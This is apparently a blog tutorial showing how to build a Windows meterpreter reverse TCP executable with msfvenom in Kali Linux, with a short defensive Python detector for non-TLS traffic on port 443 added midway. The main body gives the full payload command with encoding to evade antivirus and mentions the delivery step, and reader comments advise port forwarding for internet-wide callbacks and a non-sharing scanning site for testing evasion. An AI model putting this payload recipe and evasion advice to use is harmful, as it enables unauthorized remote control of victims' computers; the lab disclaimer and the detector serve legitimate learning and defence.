MSFVenom: How to create reverse tcp payload in Kali Linux

The power of MSFVenom!

MSFVenom provides a lot of options in a single terminal window. In this tutorial we are going to look at how to create a reverse tcp payload in the Kali Linux operating system.

For this tutorial you will need a couple of things prepared:

The VirtualBox software is needed so you will be able to run a virtual environment on your current machine. We are not going to make this payload public because that would be illegal. Instead, we are going to test this payload in our own virtual environment.

The Kali Linux ISO is needed so you will be able to run MSFVenom, which comes preinstalled on the Kali Linux operating system. You can install Kali Linux in a VirtualBox machine or you can use a physical machine to run Kali Linux on.

The Internet connection is needed so you can download the latest updates and upgrades which are available for the Kali Linux and MSFVenom environments. The updates will allow you to use the latest public payloads and techniques.

You will also need a Windows target operating system installed. We are going to target the local Windows environment because that is the only way to perform a legal payload test with the MSFVenom application.

If you use MSFVenom to gain access on computers without authorization then you will be performing an illegal act which is punishable in ALL countries.

MSFVenom

Now I believe that you have a solid local environment set up to test your pentesting skills on. The first step is to boot up the Kali Linux environment and log in so that the Kali Linux desktop is available.

If you are using the live version of the Kali Linux operating system your username and password will be:

username: root

password: toor

Now go ahead and open the terminal which is available in the Kali Linux operating system.

Enter the following commands in the terminal:

  1. sudo apt-get update
  2. sudo apt-get upgrade
  3. sudo service postgresql start
  4. sudo service metasploit start

The first two commands will check for the latest updates and the last two commands are needed for the MSFVenom environment. The postgresql service will allow the Metasploit database to be built and the Metasploit service will provide the various options that are available in the MSFVenom application.

Creating the Payload

Go ahead and open a new terminal in your Kali Linux environment. In the new terminal you will have to enter this command:

ifconfig

The ifconfig command will show you your local IP address which is used by the Kali Linux operating system. We will need this IP in the future, so make sure that you note down your IP.

The IP which is used in this tutorial is

192.168.23.103 – Kali Linux machine

Now that we know the local IP we can continue to the MSFVenom application. In the same terminal window you will need to enter the following command:

msfvenom -h

The msfvenom -h command runs msfvenom and prints the available options which can be used in the msfvenom application.

The payload

To create the reverse tcp msfvenom payload we will need to provide the following commands in the same terminal:

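msfvenom -p windows/meterpreter/reverse_tcp --list-options

The command above will show the options which are needed by the meterpreter reverse tcp payload. Older msfvenom releases used -o for this; in current releases -o names the output file and requires an argument, so it fails when given on its own.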

The msfvenom reverse tcp payload requires the following options:

LHOST=192.168.23.103

LPORT=443

So the command which will create the MSFVenom reverse tcp payload is:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.23.103 LPORT=443 -f exe > Cyberwarzone_reverse_tcp.exe

Now that we have crafted the payload, we will need to make sure that the payload is not detected by antivirus scanners. The -e x86/shikata_ga_nai -i 5 -b '\x00' options make sure that the payload is encoded, but that is not enough. The antivirus companies are aware of this method and they have found ways to identify payloads which have been encoded by the MSFVenom encoding methods.

Launching the payload

Now you have to make sure that you get the payload on the target machine. There are various ways to do this, and I will leave it at that.

We have only created the payload. We also need to create the listener, which allows us to exploit the targeted device that is running the reverse_tcp payload.
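From the defender's side, the callback described above is visible on the network: windows/meterpreter/reverse_tcp is a staged payload over plain TCP, so a connection to LPORT 443 never opens with a TLS ClientHello and the listener is the first side to send data. The Python check below is an added example, not part of the original tutorial; the flow-record fields, the Windows VM address 192.168.23.110 and the other sample flows are constructed assumptions.

```python
# Added example: flag port-443 flows that do not begin like TLS.
# Flow-record fields and all sample flows are constructed for illustration.

TLS_HANDSHAKE = 0x16   # TLS record content type "handshake"
CLIENT_HELLO = 0x01    # handshake message type "ClientHello"


def is_client_hello(data: bytes) -> bool:
    """True if data starts with a TLS handshake record carrying a ClientHello."""
    if len(data) < 6:
        return False
    record_len = int.from_bytes(data[3:5], "big")
    return (data[0] == TLS_HANDSHAKE and data[1] == 3 and data[2] <= 4
            and 0 < record_len <= 16384 and data[5] == CLIENT_HELLO)


def classify_flow(flow: dict) -> str:
    """Return 'ok', 'not-443', or the reason the flow looks wrong for HTTPS."""
    if flow["dst_port"] != 443:
        return "not-443"
    if flow["first_sender"] == "server":
        return "server-spoke-first"      # staged payload: listener pushes the stage
    if not is_client_hello(bytes.fromhex(flow["client_first_bytes"])):
        return "no-tls-clienthello"      # some other protocol riding on 443
    return "ok"


def suspicious_flows(flows):
    """Return (src, dst, reason) for every port-443 flow that is not TLS."""
    hits = []
    for flow in flows:
        reason = classify_flow(flow)
        if reason not in ("ok", "not-443"):
            hits.append((flow["src"], flow["dst"], reason))
    return hits


SAMPLE_FLOWS = [  # constructed records; 192.168.23.110 is a hypothetical Windows VM
    {"src": "192.168.23.50", "dst": "203.0.113.10", "dst_port": 443,
     "first_sender": "client", "client_first_bytes": "16030100c4010000c00303"},
    {"src": "192.168.23.110", "dst": "192.168.23.103", "dst_port": 443,
     "first_sender": "server", "client_first_bytes": ""},
    {"src": "192.168.23.51", "dst": "198.51.100.7", "dst_port": 443,
     "first_sender": "client", "client_first_bytes": "474554202f20485454502f312e31"},
    {"src": "192.168.23.52", "dst": "198.51.100.8", "dst_port": 80,
     "first_sender": "client", "client_first_bytes": "474554202f20485454502f312e31"},
]

if __name__ == "__main__":
    for hit in suspicious_flows(SAMPLE_FLOWS):
        print(hit)
```

In the lab, the same comparison can be made by capturing the traffic between the two virtual machines and checking which side sends the first payload bytes on port 443.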


6 Comments on MSFVenom: How to create reverse tcp payload in Kali Linux

  1. Hi! I really need help… I tried this and it doesn't work. I typed msfvenom -p windows/meterpreter/reverse_tcp -o then I get Error: Missing required argument for option. Please help!

  2. Hey there, I have an issue regarding an android payload. When I open the apk file on the phone, and have msfconsole open and ready, after opening the apk there is no communication/sessions? I tried port triggering the lports I used but nothing… What do you think is going on?
    Thank you

  3. It depends on where that attack is going to take place. If it is over the WAN then you should port forward in order to get a session started. If it is over LAN then try again because you might have done something wrong.

  4. Also I forgot to explain to you that you also need to use your public IP in order to use the hack over WAN (internet); LAN only requires the local IP.

  5. YES, don't do that. If you want, there is this site called nodistribute which is the same but it doesn't share the results with the antiviruses.
